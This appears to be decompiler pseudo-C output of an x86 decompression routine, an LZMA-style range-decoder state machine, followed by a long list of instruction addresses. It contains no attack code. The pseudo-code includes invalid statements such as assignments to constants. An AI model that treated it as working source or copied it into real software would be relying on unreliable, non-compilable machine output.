							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                        0x00405f92
                                                                                                        0x00405f99
                                                                                                        0x00405f9f
                                                                                                        0x00405fa5
                                                                                                        0x00000000
                                                                                                        0x00405fa9
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcb
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe0
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602b
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406030
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x00406048
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x0040609f
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a4
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c1
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406107
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067af
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067e5
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x0040680d
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x004061a1
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
